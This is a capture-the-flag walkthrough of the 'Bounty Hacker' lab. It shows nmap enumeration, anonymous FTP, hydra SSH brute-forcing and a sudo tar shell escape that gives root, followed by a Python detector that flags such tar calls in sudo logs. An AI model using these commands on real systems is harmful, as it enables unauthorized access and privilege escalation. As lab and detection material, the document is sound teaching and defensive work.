💰Bounty Hacker

You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!

Enumeration

I first ran an Nmap service scan to detect open services.

nmap -sC -sV 10.10.10.10

This returned ports 21 (FTP), 22 (SSH) and 80 (HTTP). The good thing about running -sC (default scripts) is that it identified that anonymous FTP login is allowed. So, we can connect via FTP.

ftp 10.10.10.10

One of the files available to us is locks.txt, which contains a list of what looks to be passwords.

Exploitation

On the webserver, we're given a list of members of the 'Red Dragon Syndicate'.

spike
jet
ed
edward
ein
faye
lin

We can use this list of users with the list of passwords to see if we can crack into SSH.

hydra -L users.txt -P locks.txt 10.10.10.10 ssh

We were able to get access to lin!

Privilege Escalation

Running

sudo -l

lists what lin can run with sudo.

User lin may run the following commands on bountyhacker:
    (root) /bin/tar

GTFOBins has some nifty tar commands which can help escalate privileges.

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

This command makes tar execute /bin/sh at its first checkpoint. Because tar is running as root via sudo, this gives us a shell as root!
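From the defender's side, the same command leaves a sudo log record that can be matched. The following is an added example, not part of the original write-up: it scans sudo syslog lines for tar invocations that use an option whose argument tar runs as a command. The log lines, timestamps and function names are constructed for illustration.

```python
import re

# GNU tar long options whose argument is a command that tar itself runs.
EXEC_OPTIONS = (
    "--checkpoint-action",     # exec=CMD runs CMD at each checkpoint
    "--to-command",            # pipes each extracted file to CMD
    "--use-compress-program",  # runs CMD as the (de)compressor
    "--rsh-command",           # runs CMD in place of rsh
    "--info-script",           # runs CMD at the end of each volume
)

# sudo's syslog record: "<user> : TTY=.. ; PWD=.. ; USER=<runas> ; COMMAND=<argv>"
SUDO_RE = re.compile(
    r"sudo(?:\[\d+\])?:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$"
)

# Constructed sample input (hostname and user taken from the page, the rest invented).
SAMPLE_LOG = """\
Jul 27 10:01:12 bountyhacker sudo:      lin : TTY=pts/0 ; PWD=/home/lin ; USER=root ; COMMAND=/bin/tar -cf /root/backup.tar /etc
Jul 27 10:03:40 bountyhacker sudo:      lin : TTY=pts/0 ; PWD=/home/lin ; USER=root ; COMMAND=/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Jul 27 10:05:02 bountyhacker sudo:      lin : TTY=pts/0 ; PWD=/home/lin ; USER=root ; COMMAND=/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-a=exec=/bin/sh
Jul 27 10:06:00 bountyhacker sshd[812]: Accepted password for lin from 10.10.10.20 port 50022 ssh2
""".splitlines()

def exec_option(arg):
    """Return the exec-capable tar option that `arg` selects, or None."""
    if arg.startswith("-I"):               # short form of --use-compress-program
        return "--use-compress-program"
    name = arg.split("=", 1)[0]
    # GNU tar accepts abbreviated long options, so compare by prefix. A bare
    # --checkpoint is a separate, harmless option and must not match.
    if not name.startswith("--") or name == "--checkpoint" or len(name) < 5:
        return None
    return next((opt for opt in EXEC_OPTIONS if opt.startswith(name)), None)

def find_tar_escapes(lines):
    """Return (user, runas, option, command) for each flagged sudo tar call."""
    hits = []
    for line in lines:
        m = SUDO_RE.search(line)
        argv = m["cmd"].split() if m else []
        if not argv or argv[0].rsplit("/", 1)[-1] != "tar":
            continue
        opt = next(filter(None, map(exec_option, argv[1:])), None)
        if opt:
            hits.append((m["user"], m["runas"], opt, m["cmd"]))
    return hits

if __name__ == "__main__":
    for hit in find_tar_escapes(SAMPLE_LOG):
        print(hit)
```

Detection only covers the symptom: the root cause is the unrestricted (root) /bin/tar sudoers entry, which lets lin pass tar any option at all.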
